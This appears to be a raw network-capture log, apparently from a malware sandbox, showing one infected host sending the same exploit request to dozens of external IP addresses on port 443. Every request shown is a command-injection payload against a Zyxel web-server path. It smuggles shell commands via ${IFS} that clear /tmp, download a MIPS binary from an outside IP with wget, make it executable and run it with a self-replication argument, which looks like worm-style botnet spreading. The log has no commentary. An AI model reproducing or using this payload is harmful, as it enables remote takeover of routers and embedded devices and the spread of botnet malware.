                                                Jan 12, 2024 18:16:38.814807892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8279192.168.2.235291223.180.5.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814860106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8280192.168.2.235316670.167.203.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814922094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8281192.168.2.2335486169.250.57.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.814971924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8282192.168.2.2348116156.61.21.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815026045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8283192.168.2.2348164132.129.243.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815076113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8284192.168.2.2358836218.243.143.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815140963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8285192.168.2.235276268.201.212.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815170050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8286192.168.2.235633413.9.221.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815257072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8287192.168.2.2350570213.166.168.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815290928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8288192.168.2.234258459.230.12.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815357924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8289192.168.2.2342342142.193.188.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815414906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8290192.168.2.2345184198.35.164.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815463066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8291192.168.2.2357314191.16.149.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815526009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8292192.168.2.233964860.205.85.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815581083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8293192.168.2.2359160114.149.249.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815644026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8294192.168.2.235877885.149.137.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815707922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8295192.168.2.235261077.180.28.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815754890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8296192.168.2.2340594115.250.176.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815802097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8297192.168.2.234044296.75.44.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815865040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8298192.168.2.2344856129.148.80.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815892935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8299192.168.2.235962217.78.0.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815937996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8300192.168.2.2341760165.15.20.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.815978050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8301192.168.2.236061099.141.209.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816040039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8302192.168.2.233800883.75.42.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816076040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8303192.168.2.2336998147.30.16.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816114902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8304192.168.2.2342984190.176.255.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816188097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8305192.168.2.2344308114.221.207.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816243887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8306192.168.2.23364648.8.78.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816291094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8307192.168.2.2356862220.153.217.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816343069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8308192.168.2.234462059.188.25.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816431046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8309192.168.2.2338646191.163.255.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816487074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8310192.168.2.2355772201.198.214.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816555977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8311192.168.2.234357470.93.191.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816618919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8312192.168.2.234607277.17.6.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816679001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8313192.168.2.2359220103.248.7.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816757917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8314192.168.2.2348996103.78.179.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816807985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8315192.168.2.2359596111.189.207.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816886902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8316192.168.2.234733079.25.111.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816936016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8317192.168.2.2359970132.91.188.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.816996098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8318192.168.2.234860271.11.1.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817049980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8319192.168.2.2358508176.241.146.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817082882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8320192.168.2.234116432.145.143.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817147017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8321192.168.2.234423479.127.69.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817200899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8322192.168.2.2341462133.148.32.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817255020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8323192.168.2.2354326189.248.136.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817312002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8324192.168.2.2336182106.71.7.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817368031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8325192.168.2.2334784200.27.170.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817431927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8326192.168.2.234034086.239.8.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817483902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8327192.168.2.234762631.1.192.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817522049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8328192.168.2.233644048.254.241.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817579031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8329192.168.2.2336006220.90.60.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817620039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8330192.168.2.2354350160.111.194.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817660093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8331192.168.2.2346824101.21.231.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817718983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8332192.168.2.235842272.34.244.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817776918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8333192.168.2.234377672.216.26.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817837954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8334192.168.2.2358858199.98.234.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817909956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8335192.168.2.2354092185.27.104.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.817956924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8336192.168.2.2349832199.98.46.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818011045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8337192.168.2.2352798185.59.38.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818075895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8338192.168.2.2335256213.190.97.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818111897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8339192.168.2.235349431.236.129.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818150043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8340192.168.2.2352216113.68.223.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818214893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8341192.168.2.2345460203.44.164.173443
                                                TimestampBytes transferredDirectionData
